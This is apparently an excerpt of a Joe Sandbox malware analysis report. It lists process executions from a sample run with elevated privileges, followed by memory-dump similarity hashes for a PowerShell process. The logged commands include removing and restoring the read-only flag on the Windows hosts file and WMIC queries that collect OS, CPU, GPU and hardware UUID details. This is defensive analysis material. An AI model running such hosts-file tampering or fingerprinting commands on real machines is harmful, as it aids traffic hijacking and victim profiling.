                                                                                                                            Has exited:true

                                                                                                                            Target ID:7
                                                                                                                            Start time:14:38:01
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:13
                                                                                                                            Start time:14:38:06
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                            Imagebase:0x7ff75eb80000
                                                                                                                            File size:23'040 bytes
                                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            Target ID:14
                                                                                                                            Start time:14:38:06
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:15
                                                                                                                            Start time:14:38:06
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                            Imagebase:0x7ff75eb80000
                                                                                                                            File size:23'040 bytes
                                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            Target ID:16
                                                                                                                            Start time:14:38:06
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:17
                                                                                                                            Start time:14:38:12
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:wmic os get Caption
                                                                                                                            Imagebase:0x7ff6212c0000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:18
                                                                                                                            Start time:14:38:12
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:19
                                                                                                                            Start time:14:38:12
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:wmic cpu get Name
                                                                                                                            Imagebase:0x7ff6212c0000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:20
                                                                                                                            Start time:14:38:12
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:21
                                                                                                                            Start time:14:38:13
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:wmic path win32_VideoController get name
                                                                                                                            Imagebase:0x7ff6212c0000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:22
                                                                                                                            Start time:14:38:13
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:24
                                                                                                                            Start time:14:38:14
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:wmic csproduct get UUID
                                                                                                                            Imagebase:0x7ff6212c0000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:25
                                                                                                                            Start time:14:38:14
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 50c4759b922146e431ed900a7a8e17e71faa2deab0f49f7c2b51934b207d1cad
                                                                                                                              • Instruction ID: b1cca3286a0ed4449803e78b86a076b4b9dff3b6192d1d751229d565710e2c40
                                                                                                                              • Opcode Fuzzy Hash: 50c4759b922146e431ed900a7a8e17e71faa2deab0f49f7c2b51934b207d1cad
                                                                                                                              • Instruction Fuzzy Hash: A1F0E232A8D5498FE798EB1CE0458A877E0EF46320B1140BAE04DC7063DA26EC45CB80
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.1312557955.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_7ffaac480000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: L_^$L_^$L_^$a$b
                                                                                                                              • API String ID: 0-1605990879
                                                                                                                              • Opcode ID: a16891c1ca3171c3b09e9c23b76247be41c1f23f044b0576cbf7584b4f5b8435
                                                                                                                              • Instruction ID: 3ea8c57a69f94cde64b3ddaa694ce71f5387d3225fab9b22d62875f94f61b49d
                                                                                                                              • Opcode Fuzzy Hash: a16891c1ca3171c3b09e9c23b76247be41c1f23f044b0576cbf7584b4f5b8435
                                                                                                                              • Instruction Fuzzy Hash: 3061CBD390EBC28FF25647A89C2E0B96FD0EF5361970C42FAD0A84A597D9489D1D83C6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.1312557955.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_7ffaac480000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: L_^$L_^$L_^$L_^
                                                                                                                              • API String ID: 0-2357752022
                                                                                                                              • Opcode ID: 12ea0b8adf912af5e3f690a735c8d616e39b85013e72f49450ea8bef193246c4
                                                                                                                              • Instruction ID: 1871d99934cbe5425aaa0684a16f5c6bca8339440b0f7451a9b627747132431e
                                                                                                                              • Opcode Fuzzy Hash: 12ea0b8adf912af5e3f690a735c8d616e39b85013e72f49450ea8bef193246c4
                                                                                                                              • Instruction Fuzzy Hash: CA31BFD390EBC39BF756075998AA0B52FE0EF2360970981F2C5E84A193ED19581E4396